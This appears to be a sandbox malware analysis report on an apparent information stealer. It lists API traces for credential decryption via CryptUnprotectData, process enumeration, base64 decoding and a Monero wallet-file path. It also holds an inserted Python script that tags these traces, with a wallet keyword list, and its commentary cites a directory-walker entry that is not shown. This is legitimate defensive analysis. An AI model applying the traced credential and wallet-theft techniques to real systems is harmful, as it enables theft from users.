                                  • Instruction Fuzzy Hash: 2A124571A15118EBCB24FB64DCAAEED7379AF54310F4045D9B50A520D1EE386FC8CBA2
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 8ly{$EQm_$[q#&$w_n~$Or!$=[
                                  • API String ID: 0-3165474912
                                  • Opcode ID: 111070536e22c7ff6d6f3b8a28cf1c4bf40a06441d78fa367f558720f581b1d6
                                  • Instruction ID: 9112d7ff66b5fc54f1b58f4aaaa795939da7517be83d754121f4f4c5d7042236
                                  • Opcode Fuzzy Hash: 111070536e22c7ff6d6f3b8a28cf1c4bf40a06441d78fa367f558720f581b1d6
                                  • Instruction Fuzzy Hash: 00B24AF3A082149FE304AE2DDC8567AFBE5EFD4720F1A853DEAC583744E63598058693
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7qN>$JMlU$fU}$'~u$g[w$O
                                  • API String ID: 0-4039021827
                                  • Opcode ID: 9fa9ab71c475572cfeb1ec250d00d50dfd0657364c68952d1f86575371c2708f
                                  • Instruction ID: bb243bb6c8f6ece9d6c1de07910cc1b9180fb2ecb06383f78d4ed9474d4cf97d
                                  • Opcode Fuzzy Hash: 9fa9ab71c475572cfeb1ec250d00d50dfd0657364c68952d1f86575371c2708f
                                  • Instruction Fuzzy Hash: 6DB24AF3A082149FE3046E2DEC8567AFBE9EF94720F1A453DEAC4C3744E93598018696
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 4yWC$;any$Rvz$zTeg${%ic$|,hR
                                  • API String ID: 0-1231020278
                                  • Opcode ID: d85ba3b68595705f90f1349e8a039dbf3357ecc43a2cf7129eeb41db822f680e
                                  • Instruction ID: ce128a3af33131954077d9008c5ce98014b5bdce0751cd2fbdfacac04043e967
                                  • Opcode Fuzzy Hash: d85ba3b68595705f90f1349e8a039dbf3357ecc43a2cf7129eeb41db822f680e
                                  • Instruction Fuzzy Hash: EDB2F6F360C204AFE3046E2DEC8567ABBE9EFD4720F1A493DEAC583740E63558158697
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                  • LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: >Op
                                  • API String ID: 4291131564-4132451198
                                  • Opcode ID: 15f57ac73ad44e160b2a82dee46d0b59dc445762e88c3ae852ea6c13c2131112
                                  • Instruction ID: aff60c98080c7938812a3e669166a81d246daeccdb81b2e3f272ae4dfe1762ea
                                  • Opcode Fuzzy Hash: 15f57ac73ad44e160b2a82dee46d0b59dc445762e88c3ae852ea6c13c2131112
                                  • Instruction Fuzzy Hash: BA11C374245308EFEB10CFA4CC95FAA77B5FB88B04F208159FA159B2D0C776A941CB50
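The two entries above are worth reading together: the first is a directory walker (FindFirstFileA over `\*.*`, two StrCmpCA checks per entry, FindNextFileA, with lstrcpy/lstrcat path building in the sub-calls and `\Monero\wallet.keys` among the resolved strings), the second is the classic CryptStringToBinaryA size-query-then-decode pair with dwFlags 0x1 (CRYPT_STRING_BASE64) around a LocalAlloc. The script below is an added example, not Joe Sandbox or Stealc code: it parses API trace lines in exactly the format printed on this page (including the "Part of subcall function" prefix), pulls out the resolved string arguments, and tags the capabilities those two call patterns imply. The tag names, the wallet keyword list and the rule thresholds are my own assumptions; the sample lines are copied from the two entries above.

```python
"""Parse Joe Sandbox 'APIs' trace lines into call records and tag capabilities.

Added example for this report, not Joe Sandbox code. The sample traces below
are copied from the FindFirstFileA and CryptStringToBinaryA entries on this page.
"""
import re
from collections import Counter

# Matches direct calls and "Part of subcall function XXXXXXXX:" lines, e.g.
#   • FindFirstFileA.KERNEL32(00000000,?,...,\*.*,00720D79), ref: 0070E5A2
#   • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,...), ref: 0071ACD5
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
CRYPT_STRING_BASE64 = 0x1  # dwFlags value passed to CryptStringToBinaryA in the trace
WALLET_MARKERS = ("wallet", "monero", "electrum", "exodus")  # assumption: path words worth flagging


def parse_trace(text):
    """One dict per API call line; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        calls.append({"api": m.group("api"), "module": m.group("module"), "args": args,
                      "ref": m.group("ref"), "subcall": m.group("sub")})  # subcall is None for direct calls
    return calls


def _is_hex(tok):
    return re.fullmatch(r"[0-9A-F]{8}", tok) is not None


def literal_args(calls):
    """Arguments that are neither '?' nor an 8-digit address, i.e. the strings the sandbox resolved."""
    return [a for c in calls for a in c["args"] if a and a != "?" and not _is_hex(a)]


def tag_capabilities(calls):
    apis = Counter(c["api"] for c in calls)
    tags = set()
    if "FindFirstFileA" in apis and "FindNextFileA" in apis:
        tags.add("directory_enumeration")
        if "StrCmpCA" in apis:          # per-entry name compare while walking (e.g. skipping . and ..)
            tags.add("entry_name_filter")
    if apis["lstrcat"] and apis["lstrcpy"]:
        tags.add("path_construction")
    if any(m in s.lower() for s in literal_args(calls) for m in WALLET_MARKERS):
        tags.add("wallet_file_target")
    b64 = [c for c in calls if c["api"] == "CryptStringToBinaryA"
           and len(c["args"]) > 2 and c["args"][2] == format(CRYPT_STRING_BASE64, "08X")]
    if b64:
        tags.add("base64_decode")
        # Same call twice with an allocation in between: first call sizes, second call decodes.
        if len(b64) >= 2 and any(c["api"] in ("LocalAlloc", "HeapAlloc", "RtlAllocateHeap") for c in calls):
            tags.add("base64_size_then_decode")
    return tags


def summarize(text):
    """Trace text in, sorted capability tags out."""
    return sorted(tag_capabilities(parse_trace(text)))


GRABBER_TRACE = """\
• Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
• Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
• Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
• Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\\Monero\\wallet.keys,00720E1A), ref: 0071ACD5
• Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
• Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
• Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\\*.*,00720D79), ref: 0070E5A2
• StrCmpCA.SHLWAPI(?,007215F0), ref: 0070E5F2
• StrCmpCA.SHLWAPI(?,007215F4), ref: 0070E608
• FindNextFileA.KERNEL32(000000FF,?), ref: 0070ECDF
"""

DECODE_TRACE = """\
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
• LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
• CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
• LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
"""

if __name__ == "__main__":
    for name, trace in (("grabber", GRABBER_TRACE), ("decoder", DECODE_TRACE)):
        print(name, summarize(trace), literal_args(parse_trace(trace)))
```

The resolved-string extraction is the part to keep an eye on: the sandbox only resolves arguments it could read at call time, so `\Monero\wallet.keys` shows up as an argument of an lstrlen sub-call rather than of the walker itself, which is why the rules look at the whole entry rather than at individual calls.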
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: GvK$P[)$W_.O$Kz$v'|
                                  • API String ID: 0-976976330
                                  • Opcode ID: 32f147625949fc2124556e8bff3cf2b73bee8e4cbe430abb775e944e31d2651e
                                  • Instruction ID: 1159d183a1fa06f21654ad6733fedf8f2d1fa715fd38d402d739871ce83d9496
                                  • Opcode Fuzzy Hash: 32f147625949fc2124556e8bff3cf2b73bee8e4cbe430abb775e944e31d2651e
                                  • Instruction Fuzzy Hash: DEB2E6F360C204AFE3046E2DEC8567AFBE9EF94720F1A463DE6C4C3744E63598158696
                                  Strings
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: \u$\u${${$}$}
                                  • API String ID: 0-582841131
                                  • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction ID: 3efbd51905c43a4c55e14c74284ec2a1286aaf7ffe3b89b99314bef04da0b84c
                                  • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                  • Instruction Fuzzy Hash: 70419212D09BC9C5CB058B7444A02AEBFB22FE6210F6D82DAC4DD5F382C778514AD3A5
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0070C971
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0070C97C
                                  • lstrcat.KERNEL32(?,00720B47), ref: 0070CA43
                                  • lstrcat.KERNEL32(?,00720B4B), ref: 0070CA57
                                  • lstrcat.KERNEL32(?,00720B4E), ref: 0070CA78
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: b1fd0fa0127fe22ae7461c8998df0ce48c93b4da3c93865b2dd62844fbbd201d
                                  • Instruction ID: dab09bab2f53efb293377eb0c03efa7d14a9f4d171b6ca85eccfc32f7ee3e96b
                                  • Opcode Fuzzy Hash: b1fd0fa0127fe22ae7461c8998df0ce48c93b4da3c93865b2dd62844fbbd201d
                                  • Instruction Fuzzy Hash: F74151B594821DEBDB10CFA4DD89BEEF7B8AB44304F1082A9F509A72C0D7745A84DF91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 007072AD
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007072B4
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007072E1
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00707304
                                  • LocalFree.KERNEL32(?), ref: 0070730E
                                  Memory Dump Source
                                   • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 757467a1030ab5eb46c49bbaf6db35f1703beb0816594001a2fa1023e66fabd8
                                  • Instruction ID: 5f36a2ce58f0cc7a2f646235991f8120319acd404a4d81c67ee861b2e1731f31
                                  • Opcode Fuzzy Hash: 757467a1030ab5eb46c49bbaf6db35f1703beb0816594001a2fa1023e66fabd8
                                  • Instruction Fuzzy Hash: E0015275A99308BBEB14DFE4DC45F9DB778AB44B00F104145FB05AB2C0D670AA409B64
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007197AE
                                  • Process32First.KERNEL32(00720ACE,00000128), ref: 007197C2
                                  • Process32Next.KERNEL32(00720ACE,00000128), ref: 007197D7
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 007197EC
                                  • CloseHandle.KERNEL32(00720ACE), ref: 0071980A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: b03a3d309544f1799842e2a3aa792510aa7d917ee43072a427077e682ccf6b33
                                  • Instruction ID: eaffd781559185621a470e6a4319cb06599b9cd829a00b12fa69bb0c9ff3fc90
                                  • Opcode Fuzzy Hash: b03a3d309544f1799842e2a3aa792510aa7d917ee43072a427077e682ccf6b33
                                  • Instruction Fuzzy Hash: 6E010C75A59209EBDB20DFE8CD54BDDB7F8BB08700F104699E609A7280E7349A80DF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: <7\h$huzx
                                  • API String ID: 0-2989614873
                                  • Opcode ID: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction ID: bd95b78963a0b9a4c3e993d84719e85bf36c618821937702ade1193858182e17
                                  • Opcode Fuzzy Hash: 302405f28a2c7e4f2f56963709478e3905fd8b0be096c3929ab9b1d6b915724c
                                  • Instruction Fuzzy Hash: 2163657241EBE41ECB27CB3067B61517F66BA1361031D49CFC8C18F5B3C6A8AA16E356
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: 'Fw_$=i$I@{$_rm
                                  • API String ID: 0-1099222569
                                  • Opcode ID: 8523cd340311964be9b59cfbcef04cc5509ae4fb7aa8b7ec384202ddce5256fa
                                  • Instruction ID: 80b1df76cf6b71abedf36c4470a187d42381a1e92a088ff9f5ecc3832df5e8c6
                                  • Opcode Fuzzy Hash: 8523cd340311964be9b59cfbcef04cc5509ae4fb7aa8b7ec384202ddce5256fa
                                  • Instruction Fuzzy Hash: 91B237F3A0C2049FE304AF2DDC8567ABBE9EB94720F16863DEAC4D3744E93558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: $[J}$=p1}$P,k$\tm
                                  • API String ID: 0-1962265822
                                  • Opcode ID: bb39262e69ae1372ed836171b61189e1c0d994a53159c6c149501e0198c3a8dc
                                  • Instruction ID: 9fb9cce583121803f22f170c1892e48d4ceb489d33636568e98378287ea91833
                                  • Opcode Fuzzy Hash: bb39262e69ae1372ed836171b61189e1c0d994a53159c6c149501e0198c3a8dc
                                  • Instruction Fuzzy Hash: 96B206F3A082049FE3046E2DEC8567AFBE9EF94720F16493DEAC4C7744E63598058696
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,007051D4,40000001,00000000,00000000,?,007051D4), ref: 00719050
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 4cc05e570b884ae77426726ed395a4d01ff227946cced3d14b6e1656976b46fb
                                  • Instruction ID: 5cb01b668047527d51677e7b8ebabcb2f35924de3c17cd699ed121196ddeaa5c
                                  • Opcode Fuzzy Hash: 4cc05e570b884ae77426726ed395a4d01ff227946cced3d14b6e1656976b46fb
                                  • Instruction Fuzzy Hash: F3110D74204205FFDF00CF98D855FAA73A9AF89310F108448FA168B290D775E9829B60
                                  APIs
